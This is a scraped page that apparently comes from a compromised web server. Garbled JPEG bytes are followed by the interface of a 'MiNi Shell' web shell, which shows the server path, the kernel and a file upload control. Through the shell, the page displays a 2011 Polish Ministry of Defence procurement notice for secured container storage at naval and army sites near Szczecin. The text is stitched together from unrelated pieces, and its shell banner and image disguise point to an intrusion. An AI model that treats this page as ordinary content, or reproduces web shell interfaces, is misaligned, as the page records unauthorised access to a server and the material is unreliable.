JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111003/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111003/316786-N-2011.html

<p class="kh_header"><b>Szczecin: Usługa polegająca na wykonaniu programów inwestycji wraz z dokumentacjami projektowymi, częścią kosztową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, uzyskaniu decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych według sporządzonej dokumentacji na realizację zadania  Przygotowanie infrastruktury do montażu kontenerowych magazynów.</b><br>
<b>Numer ogłoszenia: 316786 - 2011; data zamieszczenia: 03.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Narutowicza 17B, 70-240 Szczecin, woj. zachodniopomorskie, tel. 091 8892000, 8892026, faks 091 8892024, 8892029, 4331054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.rzi.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na wykonaniu programów inwestycji wraz z dokumentacjami projektowymi, częścią kosztową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, uzyskaniu decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych według sporządzonej dokumentacji na realizację zadania  Przygotowanie infrastruktury do montażu kontenerowych magazynów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu programów inwestycji wraz z dokumentacjami projektowymi, częścią kosztową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, uzyskaniu decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych według sporządzonej dokumentacji na realizację zadania  Przygotowanie infrastruktury do montażu kontenerowych magazynów, polegajacego na:
      
- dostosowaniu podłoża (fundament) i otoczenia pod kontenerowe magazyny;
- wykonaniu zabezpieczenia zewnętrznego kontenera - ogrodzenie;
- zapewnieniu dobrej widoczności i obserwacji obiektu - oświetlenie;
- zapewnieniu możliwości zasilania urządzeń kontenera - przyłącze elektryczne;
- zapewnieniu łączności - przyłącze telefoniczne;
- wykonaniu instalacji odgromowej i uziemienia;
- zapewnieniu dostępu i dojazdu do kontenera - drogi i chodniki;
- montaż kontenerów i podłączenie do mediów;
- wykonaniu przyłączenia systemu ochrony obiektu do systemu lokalnego w sposób zapewniający przesłanie sygnału do służby dyżurnej.

2.  Przedmiot zamówienia został podzielony na 3 części:

Część I - Dziwnów - dwa kontenery
Część II - Szczecin Podjuchy - jeden kontener
Część III - Świnoujście (teren Portu Wojennego) - jeden kontener.

3. Przedmiot zamówienia będzie zawierał wszystkie dane i wymagania niezbędne do zaprojektowania i wykonania robót budowlanych w sposób określony w przepisach, w tym techniczno-budowlanych i resortowych (MON) oraz zgodnie z zasadami wiedzy technicznej, zapewniając spełnienie wymagań podstawowych określonych w art. 5 Prawa Budowlanego oraz pozostałych wymagań wynikających z potrzeb użytkownika, a następnie wykonanie, odbiór robót budowlanych i oddanie do użytkowania obiektu budowlanego zgodnie z jego przeznaczeniem.

4. W zakres nieniejszego zamówienia wchodzi wykonanie odrębnie dla każdej miejscowości:

1) Programu inwestycji - po 3 egz. dla części I, II, III
Wykonanego zgodnie z wymaganiami § 6 Rozporządzenia Rady Ministrów z dnia 2 grudnia 2010 r. w sprawie szczegółowego sposobu finansowania inwestycji z budżetu państwa oraz wymagania Zamawiającego wynikające między innymi z potrzeby ujęcia w programie inwestycji danych niezbędnych realizacji inwestycji, w tym do opisu przedmiotu zamówienia na dokumentację projektową, który powinien spełniać wymagania art. 29. Prawa Zamówień Publicznych.
Program inwestycji należy wykonać w oparciu między innymi o:
- dane i wymagania zawarte w minimalnych wojskowych wymaganiach organizacyjno-użytkowych - (dla każdego zadania odrębny);
- dane zawarte w załączonych opracowaniach autorstwa JAKUSZ Systemy Zabezpieczeń Bankowych:
-Opis i użytkowanie magazynu,
-Projekt budowlano-wykonawczy: Instalacja elektryczna, odgromowa i antyelektrostatyczna magazynu,
- Projekt techniczny: Sygnalizacji włamania i napadu klasy SA-4 w magazynu;
- dane i wymagania wynikające z uzgodnień i opinii do programu;
- oraz dane wynikające z wizji lokalnych obiektu.

W zakres programu inwestycji wchodzi między innymi: 
- określenie ogólnych danych o obiekcie budowlanym; 
- opis stanu technicznego dla obiektu istniejącego; 
- określenie istotnych wymagań oraz uwarunkowań, w tym uwarunkowań formalno-prawnych; 
- określenie zakresu inwestycji, w tym robót budowlanych, przygotowania dokumentacyjnego i dostaw; 
- ocena efektywności inwestycji, w tym ekonomicznej efektywności; 
- określenie danych o efektach rzeczowych inwestycji i okresie jej realizacji wraz ze sporządzeniem harmonogramu; 
- określenie szacunkowego łącznego kosztu inwestycji; 
- określenie danych o okresie zagospodarowania obiektu i innych składników majątkowych, po zakończeniu realizacji inwestycji. Szczegółowe zakres i wymagania określono we wzorze programu inwestycji.

Program inwestycji należy wykonać w 3 egzemplarzach osobno dla wszystkich miejscowości wg wzoru, będącego zał. nr 15 do SIWZ.

Program inwestycji należy uzgodnić z:

Dla miejscowości Dziwnów-część I:
- Użytkownikiem - Dowódcą 8. Batalionu Saperów w Dziwnowie,
- Beneficjentem - Dowódcą Marynarki Wojennej
- Jednostką nadrzędną użytkownika - Dowódcą 8. Flotylli Ochrony Wybrzeża ze Świnoujścia,
- Inwestorem - Szefem RZI Szczecin,
- Administratorem nieruchomości - Kierownik Wojskowej Administracji Koszar w  Dziwnowie,
- Komendantem Centrum Wsparcia Teleinformatycznego MW w Wejherowie,
- Pełnomocnikiem Dowódcy MW ds. Ochrony Informacji Niejawnych z Gdyni,
- Szefem Oddziału Infrastruktury Wojskowej, Ochrony Środowiska i Dyslokacji N5 Sztabu MW w Gdyni,
- Szefem Inżynierii Morskiej Dow. MW w Gdyni,
oraz uzyskać opinię:
- Delegatury Wojskowej Ochrony Przeciwpożarowej w Szczecinie,

Dla miejscowości Szczecin Podjuchy - część II:
- Użytkownikiem - Dowódcą 5 Pułku Inżynieryjnego ze Szczecina Podjuchy,
- Jednostką nadrzędną użytkownika - Dowódcą Wojsk Lądowych,
- Inwestorem - Szefem RZI Szczecin,
- Administratorem nieruchomości - Komendantem 15 Wojskowego Oddziału Gospodarczego (15 WOG) w Szczecinie, ul. Narutowicza 10 A.
- Szefem RWŁ w Szczecinie,
oraz uzyskać opinię:
- Delegatury Wojskowej Ochrony Przeciwpożarowej w Szczecinie,

Dla miejscowości Świnoujście-część III:
- Użytkownikiem - Dowódcą 12. dywizjonu Trałowców ze Świnoujścia,
- Beneficjentem - Dowódcą Marynarki Wojennej
- Jednostką nadrzędną użytkownika - Dowódcą 8. Flotylli Ochrony Wybrzeża ze Świnoujścia,
- Inwestorem - Szefem RZI Szczecin,
- Zarządcą nieruchomości - Kierownik Wojskowej Administracji Koszar w  Świnoujściu,
- Komendantem Centrum Wsparcia Teleinformatycznego MW w Wejherowie,
- Pełnomocnikiem Dowódcy MW ds. Ochrony Informacji Niejawnych z Gdyni,
- Szefem Oddziału Infrastruktury Wojskowej, Ochrony Środowiska i Dyslokacji N5 Sztabu MW w Gdyni,
- Szefem Inżynierii Morskiej Dow. MW w Gdyni,
oraz uzyskać opinię:
- Delegatury Wojskowej Ochrony Przeciwpożarowej w Szczecinie,

Egzemplarze do uzgodnień dostarcza Wykonawca.
Uwaga:
Prace projektowe można rozpocząć po odbiorze programu inwestycji przez inwestora i jego zatwierdzeniu przez uprawnioną osobę.

Weryfikacja i odbiór programu inwestycji (programu organizacyjno-użytkowego) będzie się odbywał na zasadach określonych w § 28 i 30 z Decyzji MON nr 7/MON z dnia 14.01.2008r. (wraz ze mianami wprowadzonymi decyzją MON nr 104/MON z dnia 01.04.2011 r.) w spr. zasad opracowywania i realizacji centralnych planów rzeczowych. Przed zatwierdzeniem programu organizacyjno-użytkowego inwestor zwoła posiedzenie Komisji Oceny Projektów Inwestycyjnych i Remontowych, zwanej dalej Komisją, z udziałem przedstawicieli, o których mowa w § 28 ust. 14 i 16 oraz przedstawicieli wyspecjalizowanych służb lub instytucji.

2) Dokumentacji projektowej (dot. części I,II,III) w zakres której wchodzi wykonanie:

a) mapy sytuacyjno-wysokościowej do celów projektowych na obszarze dotyczącym opracowania - 1 egz.

b) Projektu budowlanego wraz z planem zagospodarowania działki lub terenu - 4 egz.
Spełniającego wymagania wynikające z art. 34. Prawa Budowlanego z dnia 07.07.1994 r. (Dz. U. 2006 nr 156, poz. 1118 - z późniejszymi zmianami) oraz wymagania wynikające z Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2005 nr 75, poz. 664 - z późniejszymi zmianami).

Dokumentacja projektowa zostanie wykonana w oparciu o dane i wymagania zawarte w programie inwestycji oraz o dane wynikające z wizji lokalnej obiektu.
W dokumentacji projektowej należy uwzględnić również dane dotyczące gotowych kontenerów (objętych dostawą inwestorską), wynikające z załączonych opracowań autorstwa JAKUSZ Systemy Zabezpieczeń Bankowych:
- Opis i użytkowanie magazynu, 
- Projekt budowlano-wykonawczy: Instalacja elektryczna, odgromowa i antyelektrostatyczna magazynu, 
- Projekt techniczny: Sygnalizacji włamania i napadu klasy SA-4 w magazynu.

Wykonawca uzyska dla wszystkich zadań/części I, II, III (projektów), wymagane przepisami szczególnymi, uzgodnienia lub opinie innych organów, w tym między innymi uzgodnienia z:
- rzeczoznawcą ds. bhp;
- rzeczoznawcą ds. przeciwpożarowych.

Ponadto projekt budowlany należy uzgodnić z:

Dla miejscowości Dziwnów dot.części I:

- Użytkownikiem - Dowódcą 8. Batalionu Saperów w Dziwnowie,
- Dowódcą Marynarki Wojennej
- Jednostką nadrzędną użytkownika - Dowódcą 8. Flotylli Ochrony Wybrzeża ze Świnoujścia,
- Inwestorem - Szefem RZI Szczecin,
- Administratorem nieruchomości - Kierownik Wojskowej Administracji Koszar w  Dziwnowie,
- Komendantem Centrum Wsparcia Teleinformatycznego MW w Wejherowie,
- Pełnomocnikiem Dowódcy MW ds. Ochrony Informacji Niejawnych z Gdyni,
- Szefem Oddziału Infrastruktury Wojskowej, Ochrony Środowiska i Dyslokacji N5 Sztabu MW w Gdyni,
- Szefem Inżynierii Morskiej Dow. MW w Gdyni,

Dla miejscowości Szczecin Podjuchy dot.części II:
- Użytkownikiem - Dowódcą 5 Pułku Inżynieryjnego ze Szczecina Podjuchy,
- Jednostką nadrzędną użytkownika - Dowódcą Wojsk Lądowych,
- Inwestorem - Szefem RZI Szczecin,
- Administratorem nieruchomości - Komendantem 15 Wojskowego Oddziału Gospodarczego (15 WOG) w Szczecinie, ul. Narutowicza 10 A.
- Szefem RWŁ w Szczecinie,

Dla miejscowości Świnoujście dot. części III:
- Użytkownikiem - Dowódcą 12. Dywizjonu Trałowców ze Świnoujścia,
- Dowódcą Marynarki Wojennej
- Inwestorem - Szefem RZI Szczecin,
- Administratorem nieruchomości - Kierownik Wojskowej Administracji Koszar w Świnoujściu,
- Komendantem Centrum Wsparcia Teleinformatycznego MW w Wejherowie,
- Pełnomocnikiem Dowódcy MW ds. Ochrony Informacji Niejawnych z Gdyni,
- Szefem Oddziału Infrastruktury Wojskowej, Ochrony Środowiska i Dyslokacji N5 Sztabu MW w Gdyni,
- Szefem Inżynierii Morskiej Dow. MW w Gdyni,

Wykonawca uzyska również inne uzgodnienia i opinie nie wymienione powyżej, a wymagane Prawem Budowlanym i przepisami szczególnymi.

Egzemplarze do uzgodnień dostarcza Wykonawca.

c) Projektu wykonawczego wraz z planem zagospodarowania terenu - 6 egz.
Wykonanego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2005 nr 75, poz. 664)




UWAGA: 
- w projektach branżowych podać szczegóły rozwiązań na przykład: podanie warstw; połączenia belek nadprożowych; konstrukcji stalowych; kominów itp.

d) Informacji o problematyce bezpieczeństwa i ochrony zdrowia (BIOZ) w trakcie wykonywania robót budowlanych - 4 egz.
Wykonanej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie informacji dotyczących bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia  (Dz. U. 2003 nr 120, poz. 1126 - z późniejszymi zmianami).

e) Specyfikacji technicznych wykonania i odbioru robót budowlanych - 6 egz.
Wykonanej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2005 nr 75, poz. 664 - z późniejszymi zmianami).
 
f) Kosztorysu inwestorskiego - 2 egz.
Wykonanego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. nr 130, poz. 1389 - z późniejszymi zmianami).

UWAGA:
- W kosztorysie należy wykazać rodzaje robót z podaniem kodu CPV (np. demontażowe, budowlane, sanitarne, elektryczne, itp.)
- Każdy rodzaj robót powinien zostać podzielony na elementy z podaniem jednostek miar, ilości jednostek oraz ich wartość

g) Przedmiarów robót - 6 egz.
Wykonanego zgodnie z § 6 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2005 nr 75, poz. 664). 

UWAGA:
- w przedmiarze robót do pozycji w przedmiaru robót ma być odniesienie odnośnie numeru punktu do specyfikacji technicznej wykonania i odbioru robót.
- Przedmiar powinien spełniać wymogi Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu inwestycji (Dz. U.2005 r.  nr 75, poz. 664).

h) Zestawienia kosztów zadania (ZKZ) - 2 egz.
Wykonanego zgodnie z Decyzją MON nr 7/MON z dnia 14.01.2008r. (wraz ze zmianami wprowadzonymi decyzją MON nr 104/MON z dnia 01.04.2011 r.) w spr. zasad opracowywania i realizacji centralnych planów rzeczowych wg załączonego wzoru.

i)  uzyskanie w imieniu Zamawiającego i przekazanie decyzji o pozwoleniu na budowę, wydanej na podstawie wykonanego projektu budowlanego i po spełnieniu wymagań określonych w art. 32. Prawa Budowlanego, w tym uzyskaniu w imieniu Zamawiającego wymaganych przepisami szczególnymi, pozwoleń, uzgodnień lub opinii innych organów.

j) Wykonawca  opracuje harmonogram terminowo - rzeczowo - finansowy (dla każdej części osobno) robót z określeniem podziału elementów robót i czasu potrzebnego na wykonanie robót budowlanych na podstawie przedmiotowej dokumentacji (dotyczy każdej występującej branży - wszystkie branże ujęte w jednym harmonogramie

Weryfikacja i odbiór dokumentacji projektowej będzie się odbywał na zasadach określonych w § 30 z Decyzji MON nr 7/MON z dnia 14.01.2008r. (wraz ze zmianami wprowadzonymi decyzją MON nr 104/MON z dnia 01.04.2011 r.) w spr. zasad opracowywania i realizacji centralnych planów rzeczowych. Inwestor po otrzymaniu pełnej dokumentacji projektowo-kosztorysowej zwołuje posiedzenie Komisji Oceny Projektów Inwestycyjnych i Remontowych (KOPIiR) z udziałem przedstawicieli, o których mowa w § 28 ust. 14 i 16 oraz przedstawicieli wyspecjalizowanych służb lub instytucji, w celu dokonania oceny przedstawionej dokumentacji. Z posiedzenia Komisji sporządza się protokół, który podlega zatwierdzeniu przez inwestora. W przypadku negatywnej oceny, o której mowa w ust. 5, dokonanej przez Komisję, po otrzymaniu informacji o usunięciu stwierdzonych uchybień zwołuje się ponownie posiedzenie Komisji, w celu dokonania powtórnej oceny dokumentacji.

5.  Wykonawca dostarczy dla Zamawiającego przedmiotowe opracowania (wymienione w pkt.  2 d-h oraz j) również w formie elektronicznej w formacie PDF na płycie CD pogrupowane w katalogi, w taki sposób, że 1 folder odpowiada zawartości 1 opracowania (1 teczki). Ponadto Wykonawca dostarczy dla Zamawiającego wersje elektroniczne w formatach: - ATH dla kosztorysów inwestorskich i przedmiarów robót;, specyfikacji technicznej wykonania i odbioru robót budowlanych, informacji o problematyce bezpieczeństwa i ochrony zdrowia (BIOZ), zestawienia kosztów zadania (tabele dodatkowo w programie Excel).
UWAGA
Powyższe formaty (ATH,DOC,PDF) dotyczą tylko opracowań jawnych

6.  Pełnienie nadzoru autorskiego (dot. części I, II, III) Zamawiający zleca w ramach niniejszej umowy i ceny ryczałtowej, bez prawa do dodatkowego wynagrodzenia, pełnienie nadzoru autorskiego podczas wykonywania robót na podstawie opracowanej przez siebie dokumentacji projektowej. Pełnienie nadzoru autorskiego obejmuje wykonanie podstawowych obowiązków projektanta w zakresie nadzoru autorskiego, wynikające z art. 20 ust. 1 pkt 4 Ustawy z dnia 7 lipca 1994 r. Prawo Budowlane oraz wykonywanie innych czynności wskazanych przez Zamawiającego, a w szczególności:
- potwierdzenie zgodności realizacji robót budowlanych z dokumentacją, lub stwierdzenie odstępstw i określenie skutków tych odstępstw,
- uzgodnienie z Zamawiającym i Wykonawcą robót możliwości wprowadzenia rozwiązań zamiennych w stosunku do materiałów i konstrukcji oraz rozwiązań technicznych i technologicznych,
- wyjaśnienie wątpliwości czy zakres wprowadzonych zmian nie spowoduje istotnych zmian w stosunku do zatwierdzonego projektu budowlanego, skutkujących koniecznością uzyskania nowej decyzji o pozwoleniu na budowę,
- uczestnictwo w komisjach i naradach technicznych organizowanych przez  Zamawiającego,
- ocena wyników szczegółowych badań materiałów i konstrukcji w zakresie zgodności z rozwiązaniami projektowymi, normami i innymi obowiązującymi przepisami,
- uczestnictwo w czynnościach mających na celu doprowadzenie do uzyskania projektowanych zdolności użytkowych inwestycji.
Nadzór autorski obejmuje:
- odpowiednie przygotowanie się Wykonawcy do pełnienia nadzoru autorskiego, wraz z przygotowaniem ewentualnych potrzebnych materiałów,
- dojazd na miejsce pełnienia nadzoru autorskiego oraz powrót do siedziby Wykonawcy,
- pobyt na budowie przez okres niezbędny dla wykonania wszystkich czynności związanych z pełnieniem nadzoru autorskiego,
- wykonanie nadzoru autorskiego przez dostarczenie dla Zamawiającego koniecznych dokumentów lub dokonanie odpowiednich wpisów i potwierdzeń we właściwych dokumentach, które są niezbędne z punktu widzenia celu, któremu maja służyć,
- za nadzór autorski uznaje się również czynności wykonywane przez Wykonawcę w siedzibie Zamawiającego lub Wykonawcy robót.

UWAGA
Nie uznaje się za nadzór autorski czynności związanych z usuwania oczywistych wad opracowanej przez siebie dokumentacji projektowej, jak również braku rozwiązań w dokumentacji projektowej wynikających z programu inwestycji, które można było przewidzieć na etapie projektowania, a niezbędnych do prawidłowego użytkowania obiektu.
Wykonawca ponosi odpowiedzialność wobec Zamawiającego za wszelkie nieprawidłowości  przy realizacji robót budowlanych a powstałe w wyniku wad dokumentacji projektowej.
Wykonawca pełnić będzie nadzór autorski na każde pisemne wezwanie Zamawiającego, według potrzeb wynikających z postępu robót.
Pisemne wezwanie Wykonawcy przez Zamawiającego zawierać będzie zakres nadzoru autorskiego i będzie następować w terminie nie krótszym niż 7 dni przed datą pełnienia nadzoru autorskiego.
Nadzór autorski sprawowany będzie do dnia odbioru końcowego robót budowlanych wykonywanych na podstawie wykonanej przez wykonawcę dokumentacji.
Każdorazowe dopełnienie czynności związanych z pełnieniem nadzoru autorskiego następować będzie niezwłocznie, jednak nie dłużej niż po 7 dniach oraz musi być poparte protokołem odbioru wykonanej czynności, który będzie zawierał termin jej realizacji, szczegółowy zakres nadzoru wraz z wymienieniem przeprowadzonych czynności oraz uzyskanych efektów. Protokół odbioru wykonanej usługi potwierdza podpisem właściwy (branżowo) Inspektor Nadzoru Inwestorskiego.

7.  Wykonawca do opracowań załączy pisemne oświadczenie, zgodnie z wzorem - zał. nr. 9 i 10 do SIWZ.

8. Wykonawca, po otrzymaniu informacji o wyborze jego oferty, w terminie 3 dni dostarczy dla Zamawiającego do kancelarii RZI Szczecin ze wskazaniem adresata i nr sprawy - Szef Wydziału Budownictwa w jednym egzemplarzu kopię uprawnień projektowych osób wymienionych w wykazie  osób uczestniczących w realizacji zamówienia  - potwierdzoną za zgodność z oryginałem.

9. Wykonawca, po otrzymaniu informacji o wyborze jego oferty, w terminie 3 dni dostarczy dla Zamawiającego do kancelarii RZI Szczecin ze wskazaniem adresata i nr sprawy - kierownik POIN w jednym egzemplarzu kopię potwierdzoną za zgodność z oryginałem wymienionych poniżej dokumentów:

a)	Świadectwa Bezpieczeństwa Przemysłowego I stopnia (okazanie oryginału podczas podpisywania umowy)
b)	Poświadczeń bezpieczeństwa dla niżej wymienionych osób:
- Kierownika firmy
- Pracowników wymienionych w części VII SIWZ pkt. 3) 
c) Zaświadczeń stwierdzających odbycie szkolenia z zasad informacji niejawnych kierownika firmy i wszystkich osób wymienionych w części VII SIWZ pkt. 3)
d) Świadectwa ukończenia kursów w zakresie projektowania systemów alarmowych klasy SA-4 oraz licencji pracownika zabezpieczenia technicznego II stopnia osoby wymienionej w części VII SIWZ pkt. 3) ppkt. d)
e)  Dokumentu potwierdzającego zatrudnienie pełnomocnika ochrony
f)   Dokumentu określającego przewoźnika obsługującego firmę w zakresie poczty niejawnej.

10.  Zadanie wiąże się z dostępem do informacji niejawnych na poziomie POUFNE

Klauzule tajności dokumentów:

- Program inwestycji - ZASTRZEŻONE
- Sekcja mapy sytuacyjno - wysokościowej w skali 1:500 - POUFNE
- Plan zagospodarowania terenu - POUFNE
- Dokumentacja projektowa - POUFNE
- Pozostałe opracowania nie muszą posiadać klauzuli tajności

11.  Materiały archiwalne (Minimalne Wojskowe Wymagania Organizacyjno - Użytkowe, Opis i użytkowanie - kontenerowy magazyn autorstwa JAKUSZ Systemy Zabezpieczeń Bankowych; Projekt budowlano-wykonawczy: Instalacja elektryczna, odgromowa i antyelektrostatyczna autorstwa JAKUSZ Systemy Zabezpieczeń Bankowych; Projekt techniczny: Sygnalizacji włamania i napadu klasy SA-4 autorstwa JAKUSZ Systemy Zabezpieczeń Bankowych znajdujące się w posiadaniu Zamawiającego zostaną udostępnione do wglądu w siedzibie RZI Szczecin na pisemny wniosek Wykonawcy w sposób określony przez Zamawiającego, informacji udzieli kierownik kancelarii RZI tel. 91 451-20-66. 

12.  Wykonawca zobowiązuje się do odbycia wizji lokalnej przed złożeniem oferty i zapoznaniem z zakresem przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 165.</p>

